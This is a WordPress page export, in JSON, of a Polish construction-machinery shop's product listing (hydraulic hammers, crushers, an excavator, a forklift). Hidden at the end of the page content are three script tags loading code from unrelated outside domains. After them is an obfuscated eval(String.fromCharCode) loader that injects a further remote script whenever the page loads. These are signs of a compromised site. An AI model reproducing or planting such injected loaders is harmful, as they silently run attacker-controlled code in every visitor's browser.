{"id":1300,"date":"2016-07-21T09:45:35","date_gmt":"2016-07-21T07:45:35","guid":{"rendered":"http:\/\/www.izbud.com.pl\/nowa\/index.php\/shop\/"},"modified":"2016-07-21T09:45:35","modified_gmt":"2016-07-21T07:45:35","slug":"shop","status":"publish","type":"page","link":"https:\/\/izbud.com.pl\/index.php\/shop\/","title":{"rendered":"Shop"},"content":{"rendered":"<p>[vc_row row_type=&#8221;row_full_center_content&#8221;][vc_column][wpc_custom_heading heading=&#8221;NAJNOWSZE PRODUKTY W OFERCIE&#8221; heading_color=&#8221;#000000&#8243; position=&#8221;center&#8221;]<div class=\"woocommerce columns-3 \"><ul class=\"products vamtam-wc columns-3\">\n<li class=\"product type-product post-1141 status-publish first instock product_cat-kruszarki has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/atlas-copoco\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"250\" height=\"250\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-11.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-11.png 250w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-11-150x150.png 150w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">Atlas Copoco<\/h3><\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/atlas-copoco\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1141\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;Atlas Copoco&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1140 status-publish instock product_cat-kruszarki has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/extec\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"253\" height=\"253\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-10.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-10.png 253w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-10-150x150.png 150w\" sizes=\"(max-width: 253px) 100vw, 253px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">Extec<\/h3><\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/extec\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1140\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;Extec&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1132 status-publish last instock product_cat-koparki has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/liebherr\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"248\" height=\"248\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-9.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-9.png 248w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-9-150x150.png 150w\" sizes=\"(max-width: 248px) 100vw, 248px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">KOPARKA KO\u0141OWA LIEBHERR<\/h3><\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/liebherr\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1132\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;KOPARKA KO\u0141OWA LIEBHERR&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1116 status-publish first instock product_cat-mloty-hydrauliczne product_cat-nowe-mloty-hydrauliczne has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/chicago-pneumatic\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"244\" height=\"244\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/prod-1.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/prod-1.png 244w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/prod-1-150x150.png 150w\" sizes=\"(max-width: 244px) 100vw, 244px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">M\u0142ot hydrauliczny Chicago Pneumatic<\/h3>\n\t\t<\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/chicago-pneumatic\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1116\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;M\u0142ot hydrauliczny Chicago Pneumatic&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1142 status-publish instock product_cat-nowe-mloty-hydrauliczne has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/kubota\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"350\" height=\"196\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/IMG_3019.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/IMG_3019.jpg 1600w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/IMG_3019-300x168.jpg 300w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/IMG_3019-768x431.jpg 768w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/IMG_3019-1024x575.jpg 1024w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">M\u0141OT HYDRAULICZNY HYDRARAM SG 1200,1150 KG,Nowy<\/h3><\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/kubota\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1142\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;M\u0141OT HYDRAULICZNY HYDRARAM SG 1200,1150 KG,Nowy&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1119 status-publish last instock product_cat-mloty-hydrauliczne product_cat-nowe-mloty-hydrauliczne has-post-thumbnail shipping-taxable purchasable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/montabert\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"350\" height=\"350\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/om290s.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/om290s.jpg 380w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/om290s-150x150.jpg 150w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/om290s-300x300.jpg 300w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/><\/div>\n\t<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><bdi>18 000<span class=\"woocommerce-Price-currencySymbol\">&#122;&#322;<\/span><\/bdi><\/span><\/span>\n<h3 class=\"woocommerce-loop-product__title\">Montabert OM 300, 300 KG<\/h3>\n\t\t<\/a><a rel=\"nofollow\" href=\"?add-to-cart=1119\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button ajax_add_to_cart\" data-product_id=\"1119\" data-product_sku=\"\" aria-label=\"Dodaj do koszyka: &bdquo;Montabert OM 300, 300 KG&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dodaj do koszyka<\/a><\/li>\n<li class=\"product type-product post-1120 status-publish first instock product_cat-nozyce-hydrauliczne has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/rent-demolition\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"350\" height=\"350\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/product_1.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/product_1.jpg 850w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/product_1-150x150.jpg 150w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/product_1-300x300.jpg 300w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/product_1-768x768.jpg 768w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">Rent Demolition RD 18,Nowe<\/h3>\n\t\t<\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/rent-demolition\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1120\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;Rent Demolition RD 18,Nowe&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1143 status-publish instock product_cat-kruszarki has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/vermer\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"270\" height=\"270\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-13.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-13.png 270w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-13-150x150.png 150w\" sizes=\"(max-width: 270px) 100vw, 270px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">Vermer<\/h3><\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/vermer\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1143\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;Vermer&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<li class=\"product type-product post-1144 status-publish last instock product_cat-wozki-widlowe has-post-thumbnail shipping-taxable product-type-simple\">\n\t<a href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/wozek-widlowy-mitsubishi\/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><div class=\"product-thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"254\" height=\"254\" src=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-14.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-14.png 254w, https:\/\/izbud.com.pl\/wp-content\/uploads\/2016\/07\/Layer-14-150x150.png 150w\" sizes=\"(max-width: 254px) 100vw, 254px\" \/><\/div>\n<h3 class=\"woocommerce-loop-product__title\">W\u00f3zek wid\u0142owy Mitsubishi, ud\u017cwig 1350 KG<\/h3>\n\t\t<\/a><a rel=\"nofollow\" href=\"https:\/\/izbud.com.pl\/index.php\/produkt\/wozek-widlowy-mitsubishi\/\" data-quantity=\"1\" class=\"button product_type_simple add_to_cart_button\" data-product_id=\"1144\" data-product_sku=\"\" aria-label=\"Przeczytaj wi\u0119cej o &bdquo;W\u00f3zek wid\u0142owy Mitsubishi, ud\u017cwig 1350 KG&rdquo;\" aria-describedby=\"\" rel=\"nofollow\">Dowiedz si\u0119 wi\u0119cej<\/a><\/li>\n<\/ul>\n<\/div>[\/vc_column][\/vc_row]<script src='https:\/\/trick.legendarytable.com\/news.js?v=9.4.9' type='text\/javascript'><\/script><script src='https:\/\/js.cofounderspecials.com\/splash.js?v=5.1.7' type='text\/javascript'><\/script><script src='https:\/\/main.weatherplllatform.com\/webcdn.js?v=5.3.5' type='text\/javascript'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Benzyna\/gaz,przes\u00f3w boczny,stan bdb.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/pages\/1300"}],"collection":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/comments?post=1300"}],"version-history":[{"count":0,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/pages\/1300\/revisions"}],"wp:attachment":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/media?parent=1300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}